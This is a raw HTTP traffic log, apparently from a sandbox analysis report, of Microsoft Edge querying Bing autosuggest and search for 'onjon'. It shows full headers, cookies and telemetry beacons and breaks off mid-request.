useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-g9WgPhp6D30NxwanYw1HnZEZH49ulFoiqD7irPzkowI='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:47 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:47 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=2D52CDCE3EA265AB100DD8853FF164F0; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:47 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306927.7f1a66a
GET

https://www.bing.com/qbox?query=onj&language=en-US&pt=EdgBox&cvid=00ce9ee6199e4a5db1785c0696c690a3&ig=b69b6b05a0fb4e4f962b411b4e6655f0&oit=1&cp=3&pgcl=4

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=onj&language=en-US&pt=EdgBox&cvid=00ce9ee6199e4a5db1785c0696c690a3&ig=b69b6b05a0fb4e4f962b411b4e6655f0&oit=1&cp=3&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 265
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a2f1da1482e8e5e35e4a43776a6
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-Jqw+a8x9pkhzXvaROfFo1u3RiqLPmTdoj2xNvbOrf7w='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:47 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:47 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=0414033F2BEE69883A7E16742A4C6898; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:47 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306927.7f1a809
GET

https://www.bing.com/qbox?query=onjo&language=en-US&pt=EdgBox&cvid=00ce9ee6199e4a5db1785c0696c690a3&ig=a15aaa14be3d447a9a36d03a4909c73a&oit=1&cp=4&pgcl=4

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=onjo&language=en-US&pt=EdgBox&cvid=00ce9ee6199e4a5db1785c0696c690a3&ig=a15aaa14be3d447a9a36d03a4909c73a&oit=1&cp=4&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
cache-control: private, max-age=0
content-encoding: br
expires: Wed, 04 Dec 2024 10:07:48 GMT
vary: Accept-Encoding
x-eventid: 67502a30b43d42db97a6d5f3260af01d
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
strict-transport-security: max-age=31536000; includeSubDomains; preload
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-hDGjf0szPwEeqXKGQHUCJgCy8iTcxsyiYQsCX8PRfpY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp&ndcParam=QWthbWFp"}]}
report-to: {"group":"crossorigin-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0,"include_subdomains":true}
cross-origin-embedder-policy-report-only: 'require-corp; report-to=\"crossorigin-errors\"'
cross-origin-opener-policy-report-only: 'same-origin; report-to=\"crossorigin-errors\"'
date: Wed, 04 Dec 2024 10:08:48 GMT
set-cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0; domain=.bing.com; path=/; secure; SameSite=None
set-cookie: SRCHS=PC=U531; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306928.7f1ab02
set-cookie: bm_sv=F51C12F0AB3E06E3241F6D62FF6558A7~YAAQTTZ6XGOoT4iTAQAAGM4kkRpaZi0bVBCtTANwSkAH0fWYHJL4Z0ak0eGWRx0d91Yt3S1Gpqx8fXWtiH02lu4qOYXv2Kml8ZnTM4Shu2oAy2qYJghYJNeJDUM0X2sD3J9zKV5Sai+MDA0KTxwErd5CZ50F9evkxVpRijbIgXU3WxpyRwQJ732VjazR+GZig+mxnXUW+49w0QEf9WOXAZrUwWtUY3QvDSqpxmofWDF2QGLVjjWDOJDCEdPWLA==~1; Domain=.bing.com; Path=/; Expires=Wed, 04 Dec 2024 12:08:48 GMT; Max-Age=7200; Secure
GET

https://www.bing.com/qbox?query=onjon&language=en-US&pt=EdgBox&cvid=00ce9ee6199e4a5db1785c0696c690a3&ig=70afd18e3358471490dad4f4015c4bcc&oit=1&cp=5&pgcl=4

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=onjon&language=en-US&pt=EdgBox&cvid=00ce9ee6199e4a5db1785c0696c690a3&ig=70afd18e3358471490dad4f4015c4bcc&oit=1&cp=5&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1ad6a
GET

https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531 HTTP/2.0
host: www.bing.com
ect: 4g
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1ad70
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:60,%22BC%22:339,%22SE%22:-1,%22TC%22:-1,%22H%22:449,%22BP%22:457,%22CT%22:461,%22IL%22:25},%22ad%22:[-1,-1,1263,601,1263,3772,1],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:60,%22BC%22:339,%22SE%22:-1,%22TC%22:-1,%22H%22:449,%22BP%22:457,%22CT%22:461,%22IL%22:25},%22ad%22:[-1,-1,1263,601,1263,3772,1],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHS=PC=U531
cookie: bm_sv=F51C12F0AB3E06E3241F6D62FF6558A7~YAAQTTZ6XGOoT4iTAQAAGM4kkRpaZi0bVBCtTANwSkAH0fWYHJL4Z0ak0eGWRx0d91Yt3S1Gpqx8fXWtiH02lu4qOYXv2Kml8ZnTM4Shu2oAy2qYJghYJNeJDUM0X2sD3J9zKV5Sai+MDA0KTxwErd5CZ50F9evkxVpRijbIgXU3WxpyRwQJ732VjazR+GZig+mxnXUW+49w0QEf9WOXAZrUwWtUY3QvDSqpxmofWDF2QGLVjjWDOJDCEdPWLA==~1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1adce
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 372
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHS=PC=U531
cookie: bm_sv=F51C12F0AB3E06E3241F6D62FF6558A7~YAAQTTZ6XGOoT4iTAQAAGM4kkRpaZi0bVBCtTANwSkAH0fWYHJL4Z0ak0eGWRx0d91Yt3S1Gpqx8fXWtiH02lu4qOYXv2Kml8ZnTM4Shu2oAy2qYJghYJNeJDUM0X2sD3J9zKV5Sai+MDA0KTxwErd5CZ50F9evkxVpRijbIgXU3WxpyRwQJ732VjazR+GZig+mxnXUW+49w0QEf9WOXAZrUwWtUY3QvDSqpxmofWDF2QGLVjjWDOJDCEdPWLA==~1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1adcf
GET

https://www.bing.com/local/hotelads?q=onjon&inDate=01/19/2025&outDate=01/20/2025&entityid=YN2000x1190976147452155201,YN1545x256073263,YN2000x6096471577638952817,YN2000x1190976147452155201,YN1544x243384812,YN2000x9391523170225958935,YN2000x4457774376323358039,YN2000x10959879645415552720,YN2000x11722354772439687545&IID=5672&source=serpls&usrd=false&frt=json&form=ANAB01&pc=U531&originig=6AB2CD56EF6C4338BF41C655438BDF1B&IG=6AB2CD56EF6C4338BF41C655438BDF1B

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /local/hotelads?q=onjon&inDate=01/19/2025&outDate=01/20/2025&entityid=YN2000x1190976147452155201,YN1545x256073263,YN2000x6096471577638952817,YN2000x1190976147452155201,YN1544x243384812,YN2000x9391523170225958935,YN2000x4457774376323358039,YN2000x10959879645415552720,YN2000x11722354772439687545&IID=5672&source=serpls&usrd=false&frt=json&form=ANAB01&pc=U531&originig=6AB2CD56EF6C4338BF41C655438BDF1B&IG=6AB2CD56EF6C4338BF41C655438BDF1B HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
